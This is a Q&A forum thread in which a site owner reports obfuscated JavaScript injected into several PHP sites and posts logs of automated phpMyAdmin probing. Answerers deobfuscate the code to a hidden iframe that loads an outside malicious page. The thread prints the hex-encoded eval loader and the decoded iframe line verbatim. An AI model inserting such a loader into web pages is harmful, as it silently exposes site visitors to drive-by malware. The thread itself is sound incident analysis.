# Is this a possible hack attempt?

Tags: javascript

The other day my Q&A part of my website went down, so I shut down the index as I found the error was related to a syntax error.  So I erased it and made it die.  However, when I opened it, I found:

```
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
```

I found it later among multiple PHP sites (such as wordpress' index), what I want to know is if anyone knows where it comes from and what its purpose is.

I found this in my logs too, it looks suspicious:

```
87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
 87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:17 +0400] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:19 +0400] "GET //web/phpMyAdmin/scripts/setup.php     HTTP/1.1" 301 550 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //web/scripts/setup.php HTTP/1.1" 301 539 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:21 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:23 +0400] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:25 +0400] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 301 548 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //p/m/a/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //PMA2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:27 +0400] "GET //pma2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //phpmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:29 +0400] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //webadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //sqlweb/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:31 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //webdb/scripts/setup.php HTTP/1.1" 301 541 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 301 549 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:34 +0400] "GET //admm/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
87.106.166.95 - - [19/Jul/2011:00:03:35 +0400] "GET //admn/scripts/setup.php HTTP/1.1" 301 540 "-" "-"
```

Comment: Thank you for all your replies

Answer (score 5, accepted):

Yes, that looks like a common way of obfuscating malicious code after hacking your site. It could do any number of things, and often links to a central server so its behaviour can be modified later.

To determine what this code does, we just need to run it, replacing `eval` with `console.log`. This prints out

```
document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')
```

The URL and content of the site is an attempt to disguise its purpose. It current serves a page which is obfuscated further. I've [expanded the code, here](https://gist.github.com/1094042). It seems to look at the version of your browser and plugins to target viruses to your visitors.

There are lots of bots that crawl the internet looking for vulnerable versions of software and hacking them like this automatically. Usually it's not very simple or fruitful to try track them down; just focus on being more secure next time.

Answer (score 0):

It came from a hacker.

Its purpose is to hack you.

Remove it, and upgrade your defences.

Comment: I don't know where it came from because the possible scripts are ECHP, WordPress, or Question2Answer

Answer (score 0):

Yeah, someone has gained access and inserted that. Its encrypted javascript to modify the page. An easy way to find out what is actually happening is to replace the eval() with console.log() or even alert() - that will give you the code.

I've already done that, this is what that code adds to the page:

```
<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>
```

Answer (score 0):

It is code which was injected into those websites through a vulnerability in either wordpress, a plugin, or another application running on the server.

That code, when de-obfuscated yields:

```
document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')
```

(I've edited out the domain for safety ;-))

Answer (score 0):

If you change the `eval` to a `console.log`, you get

```
document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')
```

That forum posting has now been deleted, so it won't actually do anything, but yes, you have been hacked.